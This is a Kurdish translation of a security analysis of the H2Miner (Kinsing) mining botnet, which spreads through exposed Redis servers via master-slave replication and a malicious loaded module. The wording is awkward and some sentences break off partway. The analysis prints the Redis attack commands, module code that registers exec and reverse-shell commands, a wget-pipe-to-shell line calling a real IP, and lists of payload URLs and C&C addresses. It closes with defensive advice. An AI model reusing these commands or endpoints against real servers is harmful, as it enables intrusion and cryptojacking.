Rojek berê, yek ji serverên projeya min ji hêla kurmek wusa ve hat êrîş kirin. Di lêgerîna bersiva pirsa "ev çi bû?" Min gotarek hêja ji hêla tîmê Ewlekariya Cloud Alibaba ve dît. Ji ber ku min ev gotar li ser Habré nedît, min biryar da ku wê bi taybetî ji we re wergerînim <3
entry
Di van demên dawî de, tîmê ewlehiyê ya Alibaba Cloud derketinek ji nişka ve ya H2Miner vedît. Ev cureyê kurmê xerab nebûna destûr an şîfreyên qels ji bo Redis wekî dergehên pergalên we bikar tîne, pişt re ew modula xweya xirab bi koledar re bi hevrêzkirina master-slave re hevdeng dike û di dawiyê de vê modula xirab dakêşîne makîneya êrîşkar û xirabkaran pêk tîne. talîmatên.
Di paşerojê de, êrîşên li ser pergalên we di serî de bi karanîna rêbazek ku tê de peywirên plansazkirî an bişkokên SSH-ê yên ku piştî ku êrîşkar têkeve Redis-ê li ser makîneya we hatine nivîsandin têne kirin. Xweşbextane, ev rêbaz ji ber pirsgirêkên bi kontrola destûr an ji ber guhertoyên pergalê yên cihêreng pir caran nayê bikar anîn. Lêbelê, ev rêbaza barkirina modulek xirab dikare rasterast fermanên êrîşkar bicîh bîne an bigihîje şêlê, ku ji bo pergala we xeternak e.
Ji ber hejmareke mezin a serverên Redis ên ku li ser Înternetê têne mêvandar kirin (nêzîkî 1 mîlyon), tîmê ewlehiyê ya Alibaba Cloud, wekî bîranînek dostane, pêşniyar dike ku bikarhêner Redis serhêl parve nekin û bi rêkûpêk hêza şîfreyên xwe kontrol bikin û ka ew lihevhatî ne. hilbijartina zû.
H2Miner
H2Miner botnetek madenê ye ji bo pergalên bingeh-Linux-ê ku dikare pergala we bi cûrbecûr awayan dagir bike, di nav de nebûna destûrnameyê di qelsiyên Hadoop yarn, Docker, û Redis-ê de cîbicîkirina fermana dûr (RCE). Botnetek bi dakêşana nivîsarên xerab û malware kar dike da ku daneyên we hilîne, êrîşê bi rengek horizontî berfireh bike, û peywendiyên ferman û kontrolê (C&C) biparêze.
Redis RCE
Zanînên li ser vê mijarê ji hêla Pavel Toporkov ve li ZeroNights 2018 hate parve kirin. Piştî guhertoya 4.0, Redis piştgirî dide taybetmendiyek barkirinê ya pêvekê ku ji bikarhêneran re şiyana barkirinê dide pelên ku bi C-yê di Redis de têne berhev kirin da ku emrên taybetî yên Redis bicîh bînin. Ev fonksiyon, her çend bikêrhatî be jî, lê qelsiyek heye ku tê de, di moda master-slave de, pelan dikarin bi riya moda fullresync-ê bi xulamê re hevdeng bikin. Ev dikare ji hêla êrîşker ve were bikar anîn da ku pelên xirab veguherîne. Piştî ku veguheztin qediya, êrîşkar modulê li ser mînaka Redisê ya êrîşkar bar dikin û her fermanê pêk tînin.
Analîza Kurê Malware
Di van demên dawî de, tîmê ewlehiyê yê Alibaba Cloud kifş kir ku mezinahiya koma madenê ya xerab H2Miner ji nişka ve pir zêde bûye. Li gorî analîzê, pêvajoya giştî ya rûdana êrîşê wiha ye:
H2Miner RCE Redis ji bo êrîşek bêkêmasî bikar tîne. Êrîşker pêşî êrîşî serverên Redis ên neparastî an pêşkêşkerên bi şîfreyên qels dikin.
Piştre ew fermanê bikar tînin config set dbfilename red2.so ji bo guhertina navê pelê. Piştî vê yekê êrîşkar fermanê pêk tînin slaveof ji bo danîna navnîşana mêvandarê repplication master-slave.
Dema ku mînaka Redisê ya êrîşkar têkiliyek master-xulam bi Redis-a xerab a ku xwedan êrîşkar e re saz dike, êrîşkar modula vegirtî bi karanîna fermana fullresync dişîne da ku pelan hevdeng bike. Dê pelê red2.so paşê li makîneya êrîşê were dakêşandin. Dûv re êrîşkar modula barkirinê ya ./red2.so bikar tînin da ku vê pelê dakêşin. Modul dikare fermanên ji êrîşkerek bi cih bîne an jî pêwendiyek berevajî (paşderî) bide destpêkirin da ku bigihîje makîneya êrîşê.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
Piştî pêkanîna fermaneke xerab wek / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, êrîşkar dê navê pelê paşvekêşanê ji nû ve bike û modula pergalê dakêşîne da ku şopan paqij bike. Lêbelê, pelê red2.so dê hîn jî li ser makîneya êrîşê bimîne. Ji bikarhêneran re tê şîret kirin ku bala xwe bidin hebûna pelek wusa gumanbar di peldanka mînaka xwe ya Redis de.
Digel kuştina hin pêvajoyên xerab ji bo dizîna çavkaniyan, êrîşkar li dû skrîptek xerab bi dakêşandin û pêkanîna pelên binary yên xerab ji bo . Ev tê vê wateyê ku navê pêvajoyê an navê pelrêça ku li ser mêvandar kinsing vedihewîne dibe ku destnîşan bike ku ew makîne bi vê vîrusê vegirtî ye.
Li gorî encamên endezyariya berevajî, malware bi gelemperî fonksiyonên jêrîn pêk tîne:
- Barkirina pelan û pêkanîna wan
- Zemî
- Parastina danûstendina C&C û pêkanîna fermanên êrîşkar
Masscan ji bo şopandina derveyî bikar bînin da ku bandora xwe berfireh bikin. Wekî din, navnîşana IP-ya servera C&C di bernameyê de hişk-kodkirî ye, û mêvandarê êrîşkar dê bi servera ragihandinê ya C&C re bi karanîna daxwazên HTTP re têkilî daynin, li wir agahdariya zombî (pêşkêşkara têkçûyî) di sernavê HTTP de tête nas kirin.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
Rêbazên din ên êrîşê
Navnîşan û girêdanên ku ji hêla kurmê ve têne bikar anîn
/kinsing
• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh
s&c
• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193
Tip
Pêşîn, divê Redis ji Înternetê negihîje û divê bi şîfreyek bihêz were parastin. Her weha girîng e ku xerîdar kontrol bikin ka pelê red2.so di pelrêça Redis de tune ye û di nav pelê/pêvajoya mêvandar de "kinsing" tune.
Source: www.habr.com